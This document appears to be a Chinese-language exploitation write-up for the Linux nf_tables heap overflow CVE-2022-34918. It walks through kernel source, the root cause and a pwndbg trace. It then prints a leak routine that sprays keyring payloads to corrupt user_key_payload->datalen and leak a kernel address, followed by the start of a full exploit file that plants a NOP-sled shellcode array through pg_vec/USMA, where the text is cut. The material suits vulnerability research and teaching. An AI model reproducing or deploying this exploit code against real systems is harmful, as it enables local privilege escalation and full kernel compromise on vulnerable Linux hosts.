lockdep_assert_held(&nft_net->commit_mutex);

table = nft_table_lookup(net, nla[NFTA_RULE_TABLE], family, genmask,
NETLINK_CB(skb).portid); /* resolve the table */
if (IS_ERR(table)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_TABLE]);
return PTR_ERR(table);
}

if (nla[NFTA_RULE_CHAIN]) { /* resolve the chain by name */
chain = nft_chain_lookup(net, table, nla[NFTA_RULE_CHAIN],
genmask);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN]);
return PTR_ERR(chain);
}
if (nft_chain_is_bound(chain))
return -EOPNOTSUPP;

} else if (nla[NFTA_RULE_CHAIN_ID]) {
/* ...or by chain id */
chain = nft_chain_lookup_byid(net, nla[NFTA_RULE_CHAIN_ID]);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN_ID]);
return PTR_ERR(chain);
}
} else {
return -EINVAL;
}

if (nla[NFTA_RULE_HANDLE]) {
/* a handle names an existing rule: only NLM_F_REPLACE is accepted */
handle = be64_to_cpu(nla_get_be64(nla[NFTA_RULE_HANDLE]));
rule = __nft_rule_lookup(chain, handle);
if (IS_ERR(rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_HANDLE]);
return PTR_ERR(rule);
}

if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_HANDLE]);
return -EEXIST;
}
if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
old_rule = rule;
else
return -EOPNOTSUPP;
} else {
/* no handle: this must be a pure create (NLM_F_CREATE without NLM_F_REPLACE) */
if (!(info->nlh->nlmsg_flags & NLM_F_CREATE) ||
info->nlh->nlmsg_flags & NLM_F_REPLACE)
return -EINVAL;
handle = nf_tables_alloc_handle(table);

/* chain->use is incremented further down; refuse if it would wrap */
if (chain->use == UINT_MAX)
return -EOVERFLOW;

/* optional anchor rule the new rule is inserted relative to */
if (nla[NFTA_RULE_POSITION]) {
pos_handle = be64_to_cpu(nla_get_be64(nla[NFTA_RULE_POSITION]));
old_rule = __nft_rule_lookup(chain, pos_handle);
if (IS_ERR(old_rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_POSITION]);
return PTR_ERR(old_rule);
}
} else if (nla[NFTA_RULE_POSITION_ID]) {
old_rule = nft_rule_lookup_byid(net, nla[NFTA_RULE_POSITION_ID]);
if (IS_ERR(old_rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_POSITION_ID]);
return PTR_ERR(old_rule);
}
}
}

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, chain, nla);

n = 0;
size = 0;
if (nla[NFTA_RULE_EXPRESSIONS]) { /* when expressions are supplied, walk them all first and accumulate their total size in `size` */
expr_info = kvmalloc_array(NFT_RULE_MAXEXPRS,
sizeof(struct nft_expr_info),
GFP_KERNEL);
if (!expr_info)
return -ENOMEM;

nla_for_each_nested(tmp, nla[NFTA_RULE_EXPRESSIONS], rem) {
err = -EINVAL;
if (nla_type(tmp) != NFTA_LIST_ELEM)
goto err_release_expr;
/* expr_info[] has exactly NFT_RULE_MAXEXPRS slots */
if (n == NFT_RULE_MAXEXPRS)
goto err_release_expr;
err = nf_tables_expr_parse(&ctx, tmp, &expr_info[n]);
if (err < 0) {
NL_SET_BAD_ATTR(extack, tmp);
goto err_release_expr;
}
size += expr_info[n].ops->size;
n++;
}
}
/* Check for overflow of dlen field */
err = -EFBIG;
if (size >= 1 << 12)
goto err_release_expr;

if (nla[NFTA_RULE_USERDATA]) { /* when userdata is supplied, compute the space it needs in `usize` */
ulen = nla_len(nla[NFTA_RULE_USERDATA]);
if (ulen > 0)
usize = sizeof(struct nft_userdata) + ulen;
}

err = -ENOMEM;
rule = kzalloc(sizeof(*rule) + size + usize, GFP_KERNEL); /* allocate the rule and initialise its fields */
if (rule == NULL)
goto err_release_expr;

nft_activate_next(net, rule);

rule->handle = handle;
rule->dlen = size;
rule->udata = ulen ? 1 : 0;

if (ulen) {
udata = nft_userdata(rule);
/* the stored length is the real length minus one */
udata->len = ulen - 1;
nla_memcpy(udata->data, nla[NFTA_RULE_USERDATA], ulen);
}

/* instantiate each parsed expression back to back inside the rule */
expr = nft_expr_first(rule);
for (i = 0; i < n; i++) {
err = nf_tables_newexpr(&ctx, &expr_info[i], expr);
if (err < 0) {
NL_SET_BAD_ATTR(extack, expr_info[i].attr);
goto err_release_rule;
}

if (expr_info[i].ops->validate)
nft_validate_state_update(net, NFT_VALIDATE_NEED);

/* cleared so that err_release_expr skips entries already instantiated */
expr_info[i].ops = NULL;
expr = nft_expr_next(expr);
}

if (chain->flags & NFT_CHAIN_HW_OFFLOAD) {
flow = nft_flow_rule_create(net, rule);
if (IS_ERR(flow)) {
err = PTR_ERR(flow);
goto err_release_rule;
}
}

if (info->nlh->nlmsg_flags & NLM_F_REPLACE) {
/* replace: schedule deletion of the old rule and link the new one next to it */
err = nft_delrule(&ctx, old_rule);
if (err < 0)
goto err_destroy_flow_rule;

trans = nft_trans_rule_add(&ctx, NFT_MSG_NEWRULE, rule);
if (trans == NULL) {
err = -ENOMEM;
goto err_destroy_flow_rule;
}
list_add_tail_rcu(&rule->list, &old_rule->list);
} else {
trans = nft_trans_rule_add(&ctx, NFT_MSG_NEWRULE, rule);
if (!trans) {
err = -ENOMEM;
goto err_destroy_flow_rule;
}

/* NLM_F_APPEND selects which side of the anchor (or of the chain) the rule is linked on */
if (info->nlh->nlmsg_flags & NLM_F_APPEND) {
if (old_rule)
list_add_rcu(&rule->list, &old_rule->list);
else
list_add_tail_rcu(&rule->list, &chain->rules);
} else {
if (old_rule)
list_add_tail_rcu(&rule->list, &old_rule->list);
else
list_add_rcu(&rule->list, &chain->rules);
}
}
kvfree(expr_info);
chain->use++;

if (flow)
nft_trans_flow_rule(trans) = flow;

if (nft_net->validate_state == NFT_VALIDATE_DO)
return nft_table_validate(net, table);

return 0;

/* error unwinding, innermost resource first */
err_destroy_flow_rule:
if (flow)
nft_flow_rule_destroy(flow);
err_release_rule:
nf_tables_rule_release(&ctx, rule);
err_release_expr:
/* drop module references for expressions that were parsed but never instantiated */
for (i = 0; i < n; i++) {
if (expr_info[i].ops) {
module_put(expr_info[i].ops->type->owner);
if (expr_info[i].ops->type->release_ops)
expr_info[i].ops->type->release_ops(expr_info[i].ops);
}
}
kvfree(expr_info);

return err;
}

expression 总共有如下多种类型:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/*
 * Table of pointers to the expression type descriptors listed by the
 * write-up. Each entry is the address of an nft_expr_type object defined
 * elsewhere.
 */
static struct nft_expr_type *nft_basic_types[] = {
&nft_imm_type,
&nft_cmp_type,
&nft_lookup_type,
&nft_bitwise_type,
&nft_byteorder_type,
&nft_payload_type,
&nft_dynset_type,
&nft_range_type,
&nft_meta_type,
&nft_rt_type,
&nft_exthdr_type,
&nft_last_type,
&nft_counter_type,
};

漏洞分析

漏洞来自于 CVE-2022-34918,函数 nft_set_elem_init 存在堆溢出,溢出长度可达 64-16=48 字节,漏洞对象可以位于 kmalloc-{64,96,128,192}

先看 nft_set_elem_init 函数的源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
/*
 * Allocate and populate a set element.
 *
 * The allocation size is set->ops->elemsize + tmpl->len, while the copies
 * into the key / key_end / data extensions use set->klen and set->dlen.
 * Nothing in this function checks that the space the template reserved for
 * an extension matches the length that is copied into it.
 *
 * Returns the new element, or NULL if the allocation fails.
 */
void *nft_set_elem_init(const struct nft_set *set,
const struct nft_set_ext_tmpl *tmpl,
const u32 *key, const u32 *key_end,
const u32 *data, u64 timeout, u64 expiration, gfp_t gfp)
{
struct nft_set_ext *ext;
void *elem;

elem = kzalloc(set->ops->elemsize + tmpl->len, gfp); /* tmpl->len already includes the data length taken from desc.len by the caller */
if (elem == NULL)
return NULL;

ext = nft_set_elem_ext(set, elem);
nft_set_ext_init(ext, tmpl);

if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY))
memcpy(nft_set_ext_key(ext), key, set->klen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY_END))
memcpy(nft_set_ext_key_end(ext), key_end, set->klen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_DATA))
memcpy(nft_set_ext_data(ext), data, set->dlen); /* copies set->dlen bytes; if that differs from the desc.len used for sizing, this can write past the allocation */
if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPIRATION)) {
*nft_set_ext_expiration(ext) = get_jiffies_64() + expiration;
/* with no explicit expiration, the element expires `timeout` from now */
if (expiration == 0)
*nft_set_ext_expiration(ext) += timeout;
}
if (nft_set_ext_exists(ext, NFT_SET_EXT_TIMEOUT))
*nft_set_ext_timeout(ext) = timeout;

return elem;
}
  • 函数 memcpy 使用的拷贝长度来自于 nft_set 对象,但拷贝的目标是 nft_set_ext,其大小来自于 nft_set_ext_tmpl 对象
  • 如果 kzalloc 申请的大小和 memcpy 拷贝的大小不匹配,则可能发生堆溢出

两个关键结构体的条目如下:

1
2
3
4
5
/*
 * Header of the extension area of a set element: a generation mask, one
 * offset slot per extension type (NFT_SET_EXT_NUM of them), then the
 * variable-length extension storage itself.
 */
struct nft_set_ext {
u8 genmask;
u8 offset[NFT_SET_EXT_NUM]; /* one slot per extension id */
char data[]; /* flexible array member: the extension payloads */
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
/*
 * Descriptor of an nf_tables set. For the analysis in this write-up the
 * relevant members are `klen` and `dlen`: nft_set_elem_init() uses them as
 * the memcpy lengths for an element's key and data.
 */
struct nft_set {
struct list_head list;
struct list_head bindings;
struct nft_table *table;
possible_net_t net;
char *name;
u64 handle;
u32 ktype;
u32 dtype;
u32 objtype;
u32 size;
u8 field_len[NFT_REG32_COUNT];
u8 field_count;
u32 use;
atomic_t nelems;
u32 ndeact;
u64 timeout;
u32 gc_int;
u16 policy;
u16 udlen;
unsigned char *udata;
/* runtime data below here */
const struct nft_set_ops *ops ____cacheline_aligned;
u16 flags:14,
genmask:2;
u8 klen; /* key length; copy length for the KEY / KEY_END extensions */
u8 dlen; /* data length; copy length for the DATA extension */
u8 num_exprs;
struct nft_expr *exprs[NFT_SET_EXPR_MAX];
struct list_head catchall_list;
unsigned char data[]
__attribute__((aligned(__alignof__(u64))));
};

分析 nft_add_set_elem 函数,确定 tmpl->len 的初始化过程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
/*
 * Excerpt of nft_add_set_elem(); the "......" lines mark code elided by the
 * write-up, so this is not a complete function body.
 *
 * The parts shown build the extension template `tmpl` for a new element:
 * the key and key_end extensions are sized with set->klen, whereas the data
 * extension is sized with desc.len as produced by nft_setelem_parse_data().
 */
static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
const struct nlattr *attr, u32 nlmsg_flags)
{

......

/* per-element timeout: explicit attribute first, otherwise the set default */
timeout = 0;
if (nla[NFTA_SET_ELEM_TIMEOUT] != NULL) {
if (!(set->flags & NFT_SET_TIMEOUT))
return -EINVAL;
err = nf_msecs_to_jiffies64(nla[NFTA_SET_ELEM_TIMEOUT],
&timeout);
if (err)
return err;
} else if (set->flags & NFT_SET_TIMEOUT) {
timeout = set->timeout;
}

......

if (nla[NFTA_SET_ELEM_KEY]) {
err = nft_setelem_parse_key(ctx, set, &elem.key.val,
nla[NFTA_SET_ELEM_KEY]);
if (err < 0)
goto err_set_elem_expr;

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_KEY, set->klen); /* account for set->klen bytes of key storage in the template */
}

if (nla[NFTA_SET_ELEM_KEY_END]) {
err = nft_setelem_parse_key(ctx, set, &elem.key_end.val,
nla[NFTA_SET_ELEM_KEY_END]);
if (err < 0)
goto err_parse_key;

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_KEY_END, set->klen); /* account for set->klen bytes of key_end storage in the template */
}

......

if (nla[NFTA_SET_ELEM_OBJREF] != NULL) {
if (!(set->flags & NFT_SET_OBJECT)) {
err = -EINVAL;
goto err_parse_key_end;
}
obj = nft_obj_lookup(ctx->net, ctx->table,
nla[NFTA_SET_ELEM_OBJREF],
set->objtype, genmask);
if (IS_ERR(obj)) {
err = PTR_ERR(obj);
goto err_parse_key_end;
}
nft_set_ext_add(&tmpl, NFT_SET_EXT_OBJREF);
}

if (nla[NFTA_SET_ELEM_DATA] != NULL) {
err = nft_setelem_parse_data(ctx, set, &desc, &elem.data.val,
nla[NFTA_SET_ELEM_DATA]);
if (err < 0)
goto err_parse_key_end;

dreg = nft_type_to_reg(set->dtype);
/* validate the data against every map binding of this set */
list_for_each_entry(binding, &set->bindings, list) {
struct nft_ctx bind_ctx = {
.net = ctx->net,
.family = ctx->family,
.table = ctx->table,
.chain = (struct nft_chain *)binding->chain,
};

if (!(binding->flags & NFT_SET_MAP))
continue;

err = nft_validate_register_store(&bind_ctx, dreg,
&elem.data.val,
desc.type, desc.len);
if (err < 0)
goto err_parse_data;

if (desc.type == NFT_DATA_VERDICT &&
(elem.data.val.verdict.code == NFT_GOTO ||
elem.data.val.verdict.code == NFT_JUMP))
nft_validate_state_update(ctx->net,
NFT_VALIDATE_NEED);
}

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_DATA, desc.len); /* data storage is sized with desc.len, not set->dlen */
}

......

}
  • 在该函数中,tmpl->len 会按 desc.len(而不是 set->dlen)为 NFT_SET_EXT_DATA 扩展预留空间,两者没有必然的联系

用于控制 tmpl->len 大小的 nft_data_desc 结构体可以被用户控制,相关函数如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/*
 * Parse the data attribute of a set element into `data` and describe it in
 * `desc`.
 *
 * The length check against set->dlen is skipped when the parsed data has
 * type NFT_DATA_VERDICT, so for verdict data desc->len may differ from
 * set->dlen when this function returns 0.
 *
 * Returns 0 on success, the error from nft_data_init(), or -EINVAL on a
 * length mismatch for non-verdict data.
 */
static int nft_setelem_parse_data(struct nft_ctx *ctx, struct nft_set *set,
struct nft_data_desc *desc,
struct nft_data *data,
struct nlattr *attr)
{
int err;

err = nft_data_init(ctx, data, NFT_DATA_VALUE_MAXLEN, desc, attr); /* fill desc and data from the user-supplied attribute */
if (err < 0)
return err;

if (desc->type != NFT_DATA_VERDICT && desc->len != set->dlen) { /* a mismatch is only rejected for non-verdict data; verdict data bypasses the length check */
nft_data_release(data, desc->type);
return -EINVAL;
}

return 0;
}

漏洞的触发链为:

  • nf_tables_newsetelem -> nft_add_set_elem -> nft_set_elem_init

入侵思路

核心步骤参考了该博客:基于USMA的内核通用EXP编写思路在 CVE-2022-34918 上的实践 (veritas501.github.io)

该 CVE 的堆溢出发生在 nftables 过滤器元素添加进入过滤器的过程(这个元素可以是任何一种可以用于过滤网络流量的类型,例如 IP 地址、端口号、协议类型等)

首先使用该堆溢出来覆盖 user_key_payload->datalen 用于泄露数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
/*
 * Leak stage of the proof of concept described in the write-up.
 *
 * Sprays keyring payloads, frees some of them, adds a set element built from
 * a leak_payload, and then checks whether one of the remaining keys was
 * modified. The whole sequence is retried until such a key is found. The
 * value read back through that key is stored in the global leak_ptr.
 *
 * Returns 0 when a value was obtained, 1 otherwise.
 */
int do_leak(void) {
key_serial_t id_buffer[SPRAY_KEY_CNT] = {0};
key_serial_t corrupted_key_id = 0;

struct leak_payload leak_payload;
memset(&leak_payload, 0, sizeof(struct leak_payload));
leak_payload.len = CORRUPT_SIZE;

retry:
puts("spraying user_key_payload ...");
spray_keyring(id_buffer, SPRAY_KEY_CNT); /* fill the cache with user_key_payload objects */

puts("free some key to create holes ...");
for (int i = FREE_HOLE_BEGIN; i < SPRAY_KEY_CNT; i += FREE_HOLE_STEP) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}

puts("trigger oob write ...");
/* add the set element so that it is placed in one of the holes just freed.
 * NOTE(review): the original comment said the holes are in kmalloc-32, but
 * the spray constants in this file are labelled kmalloc-64 - confirm. */
add_elem_to_set(netfilter_sock, LEAK_SET_NAME, KMALLOC64_KEYLEN, TABLE_NAME,
ID, sizeof(struct leak_payload), (uint8_t *)&leak_payload);

puts("checking if keyring is corrupted ...");
if (is_keyring_corrupted(id_buffer, SPRAY_KEY_CNT, &corrupted_key_id)) {
/* scan the sprayed keys for the one whose user_key_payload was overwritten */
printf("found keyring %d is corrupted!", corrupted_key_id);
} else {
puts("can't found corrupted keyring, retry ...");
key_revokes(id_buffer, SPRAY_KEY_CNT);
goto retry;
}

puts("free other keyring to set rcu.func in user_key_payload ...");
for (int i = FREE_HOLE_BEGIN; i < SPRAY_KEY_CNT; i++) {
/* keep the modified key alive; it is read back below */
if (id_buffer[i] == corrupted_key_id) {
continue;
}
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}

puts("searching rcu.func ...");
/* NOTE(review): the original comment here named proc_fs_context_ops, while
 * the message printed below labels the value user_free_payload_rcu -
 * confirm which symbol is actually read. */
leak_ptr = get_keyring_leak(corrupted_key_id);
if (!leak_ptr) {
puts("leak rcu.func failed");
for (int i = 0; i < SPRAY_KEY_CNT; i++) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}
return 1;
}

printf("leak user_free_payload_rcu: 0x%08lx\n", leak_ptr);

return 0;
}
  • 通过 user_key_payload 做越界读,就可能读到 rcu.func 中的 user_free_payload_rcu 这个函数指针,从而泄露出内核代码段地址

调试信息如下:

1
2
*RDI  0xffff88800fae9548 ◂— 0x2fb0
*RSI 0xffffc90000607828 ◂— 0x0
1
0xffffffff81b96fdf <nft_set_elem_init+367>    rep movsq qword ptr [rdi], qword ptr [rsi]
1
2
3
4
pwndbg> telescope 0xffff88800fae9548
00:00000xffff88800fae9548 ◂— 0x0
01:0008│ rdi 0xffff88800fae9550 ◂— 0x8000
02:00100xffff88800fae9558 ◂— 'AAAAAAAAA'
1
2
3
4
pwndbg> telescope 0xffffc90000607828
00:00000xffffc90000607828 ◂— 0x0
01:0008│ rsi 0xffffc90000607830 —▸ 0xffffffff81b88000 (nfnetlink_rcv_batch+1456) ◂— mov qword ptr [r15 + 8], rax
02:00100xffffc90000607838 ◂— 0x1
  • user_key_payload->datalen(0xffff88800fae9550) 将会被覆盖为 0x8000
  • PS:这个 0xffffffff81b88000 源自于之前遗留的地址,我们只会使用其最后两字节

然后选择覆盖 ring buffer(pg_vec) 来打 USMA,将 user_free_payload_rcu 函数覆盖为 shellcode 即可(PS:可以使用大量的 nop 来填充 shellcode,增大打通的概率)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <limits.h>
#include <linux/keyctl.h>
#include <sys/wait.h>
#include <arpa/inet.h>
#include <sys/xattr.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <sys/types.h>
#include <sys/shm.h>
#include <sys/ipc.h>
#include <semaphore.h>
#include <sched.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/utsname.h>
#include <sys/syscall.h>
#include <linux/io_uring.h>
#include <linux/netlink.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nf_tables.h>

#include "kernelpwn.h"
#define ID 1337
#define SET_NAME "nameXXX"
#define LEAK_SET_NAME "leakXXX"
#define TABLE_NAME "tableXX"

#define IO_RING_CTX_REF_FREE_OFFSET 0xc4235d // ????????? ffffffff81c4235d t io_ring_ctx_ref_free
#define IO_RSRC_NODE_REF_ZERO_OFFSET 0xc42517 // ????????? ffffffff81c42517 t io_rsrc_node_ref_zero

// spray in kmalloc-64
#define KEY_DESC_MAX_SIZE 40
#define KEY_PAYLOAD_SIZE (32 + 1 - 24)
#define PREFIX_BUF_LEN (16)
#define RCU_HEAD_LEN (16)
#define SPRAY_KEY_CNT (150)

#define FREE_HOLE_BEGIN (100)
#define FREE_HOLE_STEP (10)

#define CORRUPT_SIZE (0x8000)

#define PHYSMAP_MASK 0xffffffff00000000

#define KMALLOC64_KEYLEN (64 - 8 - 12 - 16)

#define PAGE_SIZE 0x1000

// Element data used by do_leak(): PREFIX_BUF_LEN + RCU_HEAD_LEN filler bytes
// followed by a 16-bit length, which do_leak() sets to CORRUPT_SIZE.
// Packed so that `len` sits at byte offset 32 with no padding.
// NOTE(review): presumably rcu_buf/len are meant to overlay the header of an
// adjacent user_key_payload - confirm against the intended heap layout.
struct leak_payload {
uint8_t prefix[PREFIX_BUF_LEN];
uint8_t rcu_buf[RCU_HEAD_LEN];
uint16_t len;
} __attribute__((packed));

// Element data carrying two pointer values after PREFIX_BUF_LEN filler bytes.
// Packed so that the pointers follow the prefix with no padding.
// NOTE(review): its use is outside the visible part of the file; the field
// names suggest pg_vec entries - confirm at the call site.
struct write_payload {
uint8_t prefix[PREFIX_BUF_LEN];
char *pg_vec;
char *pg_vec2; // in case shellcode is too long
} __attribute__((packed));

typedef int32_t key_serial_t;

// spray_keyring(): allocate `spray_size` keys named "spray_key_<i>" and store
// their ids in id_buffer[0..spray_size-1].
//
// Each allocation is attempted up to three times with a 100 ms pause between
// attempts; if the last attempt still fails, err_exit("add_key") is called.
void spray_keyring(key_serial_t *id_buffer, uint32_t spray_size) {
char key_desc[0x20];
char key_payload[KEY_PAYLOAD_SIZE + 1] = {0};

for (uint32_t i = 0; i < spray_size; i++) {
snprintf(key_desc, sizeof(key_desc), "spray_key_%d", i);
memset(key_payload, 'A', KEY_PAYLOAD_SIZE);
for (int j = 0; j < 3; j++) {
// retry, after KEYCTL_REVOKE, the key is scheduled for garbage collection,
// so it is not freed immediately
// NOTE(review): 0x20 is passed as the third argument while key_payload
// holds only KEY_PAYLOAD_SIZE + 1 bytes; if that argument is the
// payload length, key_alloc() reads past the buffer - confirm against
// key_alloc() in kernelpwn.h.
id_buffer[i] = key_alloc(key_desc, key_payload, 0x20);
if (id_buffer[i] < 0) {
usleep(100 * 1000); // 100ms
} else {
break;
}
}

if (id_buffer[i] < 0) {
err_exit("add_key");
}
}
}

uint8_t shellcode[] = {
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
